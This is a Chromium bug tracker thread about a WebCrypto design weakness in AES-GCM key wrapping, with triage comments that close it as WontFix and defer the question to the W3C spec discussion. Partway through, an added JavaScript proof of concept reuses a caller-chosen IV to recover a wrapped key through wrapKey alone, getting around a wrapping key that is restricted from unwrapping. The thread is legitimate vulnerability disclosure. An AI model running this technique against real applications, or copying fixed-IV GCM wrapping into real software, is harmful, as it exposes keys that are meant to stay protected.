Issue 868929

Issue metadata

Status: WontFix
Owner: ----
Closed: Aug 13
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 2
Type: Bug



WebCrypto Design issue for AES GCM

Reported by antonio....@gmail.com, Jul 30

Issue description

UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36

Steps to reproduce the problem:
Instant Demo in https://asanso.github.io/firefox/aesgcm.html

What is the expected behavior?

What went wrong?
IMHO the WebCrypto API has a design issue (at least in the AES GCM case).
As you might see from the code in https://asanso.github.io/firefox/aesgcm.html, I have created a wrapping key that has only ["wrapKey"] usage. It should not be possible to recover back the aeskey using ["unwrapKey"].
This is indeed the case. But given the fact that the WebCrypto API allows passing an explicit IV, it is trivial in the AES GCM case to recover back the AES key using "wrapKey" again. See https://cryptosense.com/blog/attacks-on-key-wrapping-in-pkcs11-v2-40/ for the equivalent issue in the HSM case.

Did this work before? N/A 

Does this work in other browsers? No

Chrome version: 67.0.3396.99  Channel: n/a
OS Version: OS X 10.13.3
Flash Version:
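
The re-wrap described in the report, written out as an added example (not the reporter's demo page and not Chromium code): GCM encrypts in counter mode, so wrapping under a caller-chosen IV is an XOR with a fixed keystream, and wrapping the wrapped bytes again under the same IV returns the original key even though the wrapping key only has "wrapKey" usage. The all-zero IV, the 128-bit key sizes and the function name `rewrapDemo` are assumptions made for the illustration.

```javascript
// Added example. Browsers expose globalThis.crypto; older Node needs the module.
const subtle = globalThis.crypto?.subtle ?? require("node:crypto").webcrypto.subtle;
const hex = (buf) =>
  Array.from(new Uint8Array(buf), (b) => b.toString(16).padStart(2, "0")).join("");

async function rewrapDemo() {
  const aes = { name: "AES-GCM", length: 128 };
  // Constructed values: caller-chosen IV, reused for both wrap calls.
  const gcm = { name: "AES-GCM", iv: new Uint8Array(12), tagLength: 128 };

  // Wrapping key: non-extractable, usage limited to "wrapKey".
  const wrappingKey = await subtle.generateKey(aes, false, ["wrapKey"]);
  // Key to protect. wrapKey requires it to be extractable; the raw copy is
  // kept only to check the result at the end.
  const target = await subtle.generateKey(aes, true, ["encrypt"]);
  const targetRaw = hex(await subtle.exportKey("raw", target));

  // Output is ciphertext (16 bytes) followed by the 16-byte tag.
  const wrapped = new Uint8Array(await subtle.wrapKey("raw", target, wrappingKey, gcm));

  // The usage restriction works as specified: unwrapKey is refused.
  let unwrapDenied = false;
  try {
    await subtle.unwrapKey("raw", wrapped, wrappingKey, gcm, aes, true, ["encrypt"]);
  } catch (err) {
    unwrapDenied = true;
  }

  // ciphertext = key XOR keystream(wrappingKey, iv). Importing the ciphertext
  // as a key and wrapping it under the same IV XORs the keystream off again.
  const asKey = await subtle.importKey("raw", wrapped.slice(0, 16), aes, true, ["encrypt"]);
  const second = new Uint8Array(await subtle.wrapKey("raw", asKey, wrappingKey, gcm));

  return { unwrapDenied, recovered: hex(second.slice(0, 16)) === targetRaw };
}

rewrapDemo().then((r) => console.log(r));
```

Both fields come back `true`: the "unwrapKey" usage check holds, and the key bytes are recovered through "wrapKey" anyway.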
 
May you please delete this issue or make it not public? I published here by mistake.
Labels: Restrict-View-SecurityTeam
(Restricting as requested.)
Thanks @agl. Whoever will take this might also want to change the component to Blink - WebCrypto (as was my original plan before screwing things up :S)
Components: Blink>WebCrypto
Cc: eroman@chromium.org rsleevi@chromium.org
Labels: -OS-Mac
> Does this work in other browsers? No

Note that this is not specific to Chrome - other implementations (including Firefox) work this way, since the spec lets the user control the IV used during encryption.
@eroman

Yeah I know. As said above this bug was not ready to be filed. For some reason I clicked submit too early. Of course you are right about Firefox. I reported as well to them and they already filed https://github.com/w3c/webcrypto/issues/209
Ah understood!

I will defer the design question to Ryan then.
The W3C bug tracker is probably the better place to continue that discussion.
Hi guys, it would be great to hear some opinion.... :)
Status: WontFix (was: Unconfirmed)
Marking as WontFix, to continue discussion upstream.
Thanks a lot Ryan. It would actually be great to get your opinion (here or upstream is the same :))
Project Member

Comment 12 by sheriffbot@chromium.org, Nov 19

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot